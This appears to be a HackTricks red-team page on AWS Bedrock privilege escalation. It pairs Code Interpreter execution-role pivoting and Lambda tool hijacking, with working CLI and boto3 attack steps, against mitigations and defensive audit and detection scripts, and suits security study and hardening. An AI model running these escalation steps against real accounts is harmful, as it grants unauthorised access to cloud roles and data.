AWS - Bedrock PrivEsc

Tip

Learn & practice AWS hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Amazon Bedrock AgentCore

bedrock-agentcore:StartCodeInterpreterSession + bedrock-agentcore:InvokeCodeInterpreter - Code Interpreter Execution-Role Pivot

AgentCore Code Interpreter is a managed execution environment. Custom Code Interpreters can be configured with an **executionRoleArn**, which "provides permissions for the code interpreter to access AWS services".

If a lower-privileged IAM principal can start + invoke a Code Interpreter session on an interpreter configured with a more privileged execution role, the caller effectively pivots to the execution role's permissions (lateral movement / privilege escalation, depending on the role's scope).

Note

This is generally a misconfiguration / excessive-permissions issue (granting the interpreter execution role overly broad permissions and/or granting broad invoke access). AWS explicitly warns to avoid privilege escalation by ensuring execution roles have the same or fewer privileges than the identities allowed to invoke them.

Preconditions (common misconfiguration)

  • A custom code interpreter exists with an over-privileged execution role (e.g. access to sensitive S3/Secrets/SSM, or IAM-admin-like capabilities).
  • The user (developer/auditor/CI identity) has the following permissions:
    • Start sessions: bedrock-agentcore:StartCodeInterpreterSession
    • Invoke tools: bedrock-agentcore:InvokeCodeInterpreter
  • (Optional) The user can also create interpreters: bedrock-agentcore:CreateCodeInterpreter (depending on org guardrails, this allows creating a new interpreter with an execution role of their choosing).

Recon (identify custom interpreters and execution role usage)

List interpreters (control-plane) and inspect their configuration:

aws bedrock-agentcore-control list-code-interpreters
aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id <CODE_INTERPRETER_ID>

The create-code-interpreter command supports --execution-role-arn, which defines the AWS permissions the interpreter will have.
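The defender-side counterpart to the recon above is to inventory custom interpreters and compare each executionRoleArn against what its policies actually allow. The following audit script is an added example (not HackTricks' or AWS's code): the check runs on plain dicts shaped like get-code-interpreter output plus the role's policy documents, so it works offline on the constructed sample data; only the optional `load_interpreters_from_aws` helper talks to AWS, and the boto3 client/method names it uses are assumed to mirror the CLI commands above. The `SENSITIVE_ACTIONS` list is an illustrative assumption to tune per environment.

```python
"""Audit AgentCore custom Code Interpreters for over-privileged execution roles.

Added example (not HackTricks' or AWS's code). Audit logic works on plain dicts
so it runs offline; only `load_interpreters_from_aws` talks to AWS, and its
boto3 client/method names are assumed to mirror the CLI commands above.
"""
import fnmatch

# Actions a code interpreter execution role rarely needs. Illustrative
# assumption: tune this to what "sensitive" means in the environment.
SENSITIVE_ACTIONS = (
    "iam:PassRole", "iam:AttachRolePolicy", "iam:CreateAccessKey",
    "sts:AssumeRole",
    "s3:GetObject",
    "secretsmanager:GetSecretValue",
    "ssm:GetParameter",
)


def allowed_actions(policy_documents):
    """Flatten every Action from Allow statements across the policy documents."""
    actions = []
    for doc in policy_documents:
        statements = doc.get("Statement", [])
        if isinstance(statements, dict):  # a single statement may be a bare object
            statements = [statements]
        for stmt in statements:
            if stmt.get("Effect") != "Allow":
                continue
            act = stmt.get("Action", [])
            actions.extend([act] if isinstance(act, str) else act)
    return actions


def covered_sensitive_actions(policy_documents):
    """Return the sensitive actions that some Allow statement covers.

    IAM action wildcards ("*", "s3:*", "iam:Create*") are matched with fnmatch,
    case-insensitively, so "s3:*" covers "s3:GetObject". Resource/Condition
    narrowing is ignored, which keeps the check conservative (more alerts).
    """
    hits = set()
    for allowed in allowed_actions(policy_documents):
        for sensitive in SENSITIVE_ACTIONS:
            if fnmatch.fnmatchcase(sensitive.lower(), allowed.lower()):
                hits.add(sensitive)
    return sorted(hits)


def find_risky_interpreters(interpreters, role_policies):
    """interpreters: dicts shaped like get-code-interpreter output
    (codeInterpreterId, name, executionRoleArn). role_policies: mapping of
    execution role ARN -> list of policy documents attached to / inline on it.
    Returns one finding per interpreter whose role covers a sensitive action."""
    findings = []
    for ci in interpreters:
        role_arn = ci.get("executionRoleArn")
        if not role_arn:
            continue  # no execution role: nothing to pivot into
        covered = covered_sensitive_actions(role_policies.get(role_arn, []))
        if covered:
            findings.append({
                "codeInterpreterId": ci.get("codeInterpreterId"),
                "name": ci.get("name"),
                "executionRoleArn": role_arn,
                "sensitiveActions": covered,
            })
    return findings


def load_interpreters_from_aws(region):
    """Fetch interpreter details via boto3 (assumed API names; imported lazily
    so the offline audit above works without boto3 installed)."""
    import boto3
    ctl = boto3.client("bedrock-agentcore-control", region_name=region)
    out = []
    for summary in ctl.list_code_interpreters().get("codeInterpreterSummaries", []):
        out.append(ctl.get_code_interpreter(codeInterpreterId=summary["codeInterpreterId"]))
    return out


# Constructed sample data: one interpreter whose role reaches S3 and Secrets
# Manager, one whose role can only write logs, one with no execution role.
BROAD_ROLE = "arn:aws:iam::111122223333:role/AgentCoreInterpreterBroad"
MINIMAL_ROLE = "arn:aws:iam::111122223333:role/AgentCoreInterpreterMinimal"
SAMPLE_INTERPRETERS = [
    {"codeInterpreterId": "ci-example-0001", "name": "data-analysis", "executionRoleArn": BROAD_ROLE},
    {"codeInterpreterId": "ci-example-0002", "name": "scratch", "executionRoleArn": MINIMAL_ROLE},
    {"codeInterpreterId": "ci-example-0003", "name": "no-role"},
]
SAMPLE_ROLE_POLICIES = {
    BROAD_ROLE: [{"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": ["s3:*", "secretsmanager:GetSecretValue"], "Resource": "*"},
        {"Effect": "Deny", "Action": "iam:*", "Resource": "*"},
    ]}],
    MINIMAL_ROLE: [{"Version": "2012-10-17", "Statement":
        {"Effect": "Allow", "Action": "logs:PutLogEvents", "Resource": "*"}}],
}

if __name__ == "__main__":
    for f in find_risky_interpreters(SAMPLE_INTERPRETERS, SAMPLE_ROLE_POLICIES):
        print(f"[!] {f['codeInterpreterId']} ({f['name']}) -> {f['executionRoleArn']}: {f['sensitiveActions']}")
```

Run against real data, pair `load_interpreters_from_aws` with the role's attached and inline policies from IAM; any finding is a candidate for the pivot described above and should be cross-checked against who holds StartCodeInterpreterSession/InvokeCodeInterpreter on that interpreter.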

Step 1 - Start a session (this returns a sessionId, not an interactive shell)

SESSION_ID=$(
aws bedrock-agentcore start-code-interpreter-session \
--code-interpreter-identifier <CODE_INTERPRETER_IDENTIFIER> \
--name "arte-oussama" \
--query sessionId \
--output text
)

echo "SessionId: $SESSION_ID"

Step 2 - Invoke code execution (Boto3 or signed HTTPS)

There is no interactive python shell from start-code-interpreter-session. Execution happens via InvokeCodeInterpreter.

Option A - Boto3 example (execute Python + verify identity):

import boto3

client = boto3.client("bedrock-agentcore", region_name="<REGION>")

# Execute python inside the Code Interpreter session
resp = client.invoke_code_interpreter(
    codeInterpreterIdentifier="<CODE_INTERPRETER_IDENTIFIER>",
    sessionId="<SESSION_ID>",
    name="executeCode",
    arguments={
        "language": "python",
        "code": "import boto3; print(boto3.client('sts').get_caller_identity())",
    },
)

# Response is streamed; print events for visibility
for event in resp.get("stream", []):
    print(event)

If the interpreter is configured with an execution role, the sts:GetCallerIdentity() output should reflect that role's identity (not the lower-privileged caller), which demonstrates the pivot.

Option B - Signed HTTPS call (awscurl):

awscurl -X POST \
"https://bedrock-agentcore.<Region>.amazonaws.com/code-interpreters/<CODE_INTERPRETER_IDENTIFIER>/tools/invoke" \
-H "Content-Type: application/json" \
-H "Accept: application/json" \
-H "x-amzn-code-interpreter-session-id: <SESSION_ID>" \
--service bedrock-agentcore \
--region <Region> \
-d '{
"name": "executeCode",
"arguments": {
"language": "python",
"code": "print(\"Hello from AgentCore\")"
}
}'

Impact

  • Lateral movement into whatever AWS access the interpreter execution role has.
  • Privilege escalation if the interpreter execution role is more privileged than the caller.
  • Harder detection if CloudTrail data events for interpreter invocations are not enabled (invocations may not be logged by default, depending on configuration).

Mitigations / Hardening

  • Least privilege on the interpreter executionRoleArn (treat it like Lambda execution roles / CI roles).
  • Restrict who can invoke (bedrock-agentcore:InvokeCodeInterpreter) and who can start sessions.
  • Use SCPs to deny InvokeCodeInterpreter except for approved agent runtime roles (org-level enforcement can be necessary).
  • Enable appropriate CloudTrail data events for AgentCore where applicable; alert on unexpected invocations and session creation.
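The SCP and the CloudTrail alerting from the list above, worked through as an added example (not HackTricks' or AWS's code). Part 1 builds an SCP document that denies StartCodeInterpreterSession/InvokeCodeInterpreter to every principal except an approved allow-list of roles (aws:PrincipalArn resolves to the role ARN for assumed-role sessions, so session names need no special handling). Part 2 runs a detection over CloudTrail records and flags any session start or invocation by a principal outside that list. The records and role ARNs are constructed; real records only exist once the AgentCore data events are enabled.

```python
"""Org guardrail and detection for AgentCore Code Interpreter use.

Added example, not HackTricks' or AWS's code. Part 1: SCP denying interpreter
use outside an approved role list. Part 2: flag CloudTrail records where a
non-approved principal started or invoked a session. Records are constructed.
"""
import json

INTERPRETER_EVENTS = {"StartCodeInterpreterSession", "InvokeCodeInterpreter"}


def build_deny_interpreter_scp(approved_role_arns):
    """SCP (as a dict) denying interpreter use unless aws:PrincipalArn is an
    approved role. ArnNotLike accepts wildcards; for an assumed-role session
    aws:PrincipalArn is the role ARN, not the session ARN."""
    return {
        "Version": "2012-10-17",
        "Statement": [{
            "Sid": "DenyCodeInterpreterUnlessApprovedRole",
            "Effect": "Deny",
            "Action": [
                "bedrock-agentcore:StartCodeInterpreterSession",
                "bedrock-agentcore:InvokeCodeInterpreter",
            ],
            "Resource": "*",
            "Condition": {"ArnNotLike": {"aws:PrincipalArn": list(approved_role_arns)}},
        }],
    }


def principal_arn(record):
    """Role ARN for assumed-role sessions (sessionContext.sessionIssuer.arn),
    otherwise the user/root ARN from userIdentity.arn."""
    ui = record.get("userIdentity", {})
    issuer = ui.get("sessionContext", {}).get("sessionIssuer", {})
    return issuer.get("arn") or ui.get("arn")


def flag_unexpected_interpreter_use(records, approved_role_arns):
    """Return interpreter start/invoke records whose principal is not approved."""
    approved = set(approved_role_arns)
    findings = []
    for rec in records:
        if rec.get("eventSource") != "bedrock-agentcore.amazonaws.com":
            continue
        if rec.get("eventName") not in INTERPRETER_EVENTS:
            continue
        who = principal_arn(rec)
        if who in approved:
            continue
        findings.append({
            "eventTime": rec.get("eventTime"),
            "eventName": rec["eventName"],
            "principal": who,
            "interpreter": rec.get("requestParameters", {}).get("codeInterpreterIdentifier"),
        })
    return findings


# Constructed sample: the agent runtime role is approved; a developer user is not.
APPROVED_ROLES = ["arn:aws:iam::111122223333:role/AgentRuntimeRole"]
SAMPLE_RECORDS = [
    {"eventTime": "2025-01-10T09:00:01Z", "eventSource": "bedrock-agentcore.amazonaws.com",
     "eventName": "StartCodeInterpreterSession",
     "userIdentity": {"type": "AssumedRole",
                      "arn": "arn:aws:sts::111122223333:assumed-role/AgentRuntimeRole/agent-1",
                      "sessionContext": {"sessionIssuer": {"arn": APPROVED_ROLES[0]}}},
     "requestParameters": {"codeInterpreterIdentifier": "ci-example-0001"}},
    {"eventTime": "2025-01-10T09:05:12Z", "eventSource": "bedrock-agentcore.amazonaws.com",
     "eventName": "InvokeCodeInterpreter",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111122223333:user/dev-alice"},
     "requestParameters": {"codeInterpreterIdentifier": "ci-example-0001"}},
    {"eventTime": "2025-01-10T09:06:00Z", "eventSource": "bedrock-agentcore.amazonaws.com",
     "eventName": "GetCodeInterpreter",  # control-plane read, not an execution
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111122223333:user/dev-alice"},
     "requestParameters": {"codeInterpreterId": "ci-example-0001"}},
]

if __name__ == "__main__":
    print(json.dumps(build_deny_interpreter_scp(APPROVED_ROLES), indent=2))
    for f in flag_unexpected_interpreter_use(SAMPLE_RECORDS, APPROVED_ROLES):
        print(f"[!] {f['eventTime']} {f['eventName']} by {f['principal']} on {f['interpreter']}")
```

The SCP is a hard stop independent of per-account IAM drift; the detection is the safety net for accounts or OUs the SCP does not reach, and for the approved roles themselves (an approved role invoking an interpreter it normally never touches is worth a second, interpreter-scoped allow-list).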

Amazon Bedrock Agents

lambda:UpdateFunctionCode, bedrock:InvokeAgent - Agent Tool Hijacking via Lambda

Bedrock Agents can use Lambda-backed action groups as tools (external execution). If a principal can modify the code of a Lambda function used by an agent, and can then invoke the agent, they can execute attacker-controlled code under the Lambda execution role.

Note

This is a cross-service trust abuse (Bedrock → Lambda), not a vulnerability. The attacker may not be able to invoke the Lambda directly, but can still trigger it via the agent.

Preconditions (common misconfiguration)

  • A Bedrock Agent exists with an action group backed by a Lambda function
  • The attacker has:
  • lambda:UpdateFunctionCode
  • bedrock:InvokeAgent
  • The Lambda execution role has broader permissions than the attacker
  • The attacker can identify the Lambda used by the agent

Recon

Enumerate agent action groups:

aws bedrock-agent list-agents
aws bedrock-agent get-agent --agent-id <AGENT_ID>
aws bedrock-agent list-agent-action-groups --agent-id <AGENT_ID> --agent-version DRAFT

Inspect the Lambda:

aws lambda get-function --function-name <FUNCTION_NAME>

Exploitation

Replace the Lambda code:

zip payload.zip lambda_function.py

aws lambda update-function-code \
--function-name <FUNCTION_NAME> \
--zip-file fileb://payload.zip

Example payload:

import boto3

def lambda_handler(event, context):
    # Returns the identity of the Lambda execution role, proving the pivot
    return boto3.client("sts").get_caller_identity()

Trigger via agent:

aws bedrock-agent-runtime invoke-agent \
--agent-id <AGENT_ID> \
--agent-alias-id <ALIAS_ID> \
--session-id test \
--input-text "trigger tool"

Impact

  • Privilege escalation into Lambda execution role
  • Data exfiltration from AWS services
  • Cross-service abuse via trusted agent execution

Mitigations

  • Restrict lambda:UpdateFunctionCode
  • Use least-privilege Lambda roles
  • Monitor Lambda code changes
  • Audit Bedrock agent tool usage
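A defender-side companion to the Recon and Mitigations above ("Monitor Lambda code changes", "Audit Bedrock agent tool usage"), as an added example that is not HackTricks' or AWS's code: it builds the inventory of Lambda functions that back agent action groups and then flags CloudTrail records where one of those functions had its code or configuration updated by a principal outside the trusted deploy roles. The action-group dicts follow the shape of get-agent-action-group's agentActionGroup (actionGroupExecutor.lambda holds the function ARN); the CloudTrail records, ARNs and role names are constructed, and the event names UpdateFunctionCode20150331v2 / UpdateFunctionConfiguration20150331v2 are the ones CloudTrail records for those Lambda API calls.

```python
"""Inventory Lambda functions behind Bedrock Agent action groups and flag
code/config changes to them in CloudTrail.

Added example, not HackTricks' or AWS's code. Action groups follow the
agentActionGroup shape from get-agent-action-group; CloudTrail records below
are constructed sample data.
"""
CODE_CHANGE_EVENTS = {"UpdateFunctionCode20150331v2", "UpdateFunctionConfiguration20150331v2"}


def function_name(name_or_arn):
    """Normalise 'arn:aws:lambda:...:function:NAME[:QUALIFIER]' or a bare NAME to NAME."""
    return name_or_arn.rsplit(":function:", 1)[-1].split(":")[0]


def agent_backed_lambdas(action_groups):
    """Return {function name: [(agentId, actionGroupName), ...]} for every
    action group that executes a Lambda. Return-control groups
    (actionGroupExecutor.customControl) have no Lambda and are skipped."""
    backing = {}
    for ag in action_groups:
        executor = ag.get("actionGroupExecutor") or {}
        fn_arn = executor.get("lambda")
        if fn_arn:
            backing.setdefault(function_name(fn_arn), []).append((ag["agentId"], ag["actionGroupName"]))
    return backing


def principal_arn(record):
    """Role ARN for assumed-role sessions, otherwise the user/root ARN."""
    ui = record.get("userIdentity", {})
    issuer = ui.get("sessionContext", {}).get("sessionIssuer", {})
    return issuer.get("arn") or ui.get("arn")


def flag_agent_lambda_changes(records, backing, trusted_deployer_arns=()):
    """Flag Lambda code/config updates to agent-backing functions made by a
    principal outside the trusted deploy roles. Each finding lists the agents
    whose tools now run the changed code."""
    trusted = set(trusted_deployer_arns)
    findings = []
    for rec in records:
        if rec.get("eventSource") != "lambda.amazonaws.com":
            continue
        if rec.get("eventName") not in CODE_CHANGE_EVENTS:
            continue
        name = function_name(rec.get("requestParameters", {}).get("functionName", ""))
        if name not in backing:
            continue
        who = principal_arn(rec)
        if who in trusted:
            continue
        findings.append({
            "eventTime": rec.get("eventTime"),
            "eventName": rec["eventName"],
            "principal": who,
            "function": name,
            "agents": backing[name],
        })
    return findings


# Constructed sample: one Lambda-backed action group, one return-control group.
SAMPLE_ACTION_GROUPS = [
    {"agentId": "AGENT123456", "agentVersion": "DRAFT", "actionGroupName": "ticketing",
     "actionGroupExecutor": {"lambda": "arn:aws:lambda:us-east-1:111122223333:function:agent-ticketing-tool"}},
    {"agentId": "AGENT123456", "agentVersion": "DRAFT", "actionGroupName": "ask-user",
     "actionGroupExecutor": {"customControl": "RETURN_CONTROL"}},
]
TRUSTED_DEPLOYERS = ["arn:aws:iam::111122223333:role/CiDeployRole"]
SAMPLE_RECORDS = [
    # legitimate CI deployment of the tool
    {"eventTime": "2025-01-10T10:00:00Z", "eventSource": "lambda.amazonaws.com",
     "eventName": "UpdateFunctionCode20150331v2",
     "userIdentity": {"type": "AssumedRole",
                      "arn": "arn:aws:sts::111122223333:assumed-role/CiDeployRole/build-42",
                      "sessionContext": {"sessionIssuer": {"arn": TRUSTED_DEPLOYERS[0]}}},
     "requestParameters": {"functionName": "agent-ticketing-tool"}},
    # a developer user pushing code to the agent's tool outside CI
    {"eventTime": "2025-01-10T11:30:00Z", "eventSource": "lambda.amazonaws.com",
     "eventName": "UpdateFunctionCode20150331v2",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111122223333:user/dev-alice"},
     "requestParameters": {"functionName": "arn:aws:lambda:us-east-1:111122223333:function:agent-ticketing-tool"}},
    # change to a function no agent uses
    {"eventTime": "2025-01-10T11:31:00Z", "eventSource": "lambda.amazonaws.com",
     "eventName": "UpdateFunctionCode20150331v2",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111122223333:user/dev-alice"},
     "requestParameters": {"functionName": "billing-report"}},
]

if __name__ == "__main__":
    backing = agent_backed_lambdas(SAMPLE_ACTION_GROUPS)
    for f in flag_agent_lambda_changes(SAMPLE_RECORDS, backing, TRUSTED_DEPLOYERS):
        print(f"[!] {f['eventTime']} {f['eventName']} on {f['function']} by {f['principal']} affects {f['agents']}")
```

Build the inventory from list-agents / list-agent-action-groups across every agent version and alias in use, not just DRAFT, since an alias may point at an older version with a different executor; restricting lambda:UpdateFunctionCode to the deploy role then makes every finding from this check an actual policy violation rather than noise.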
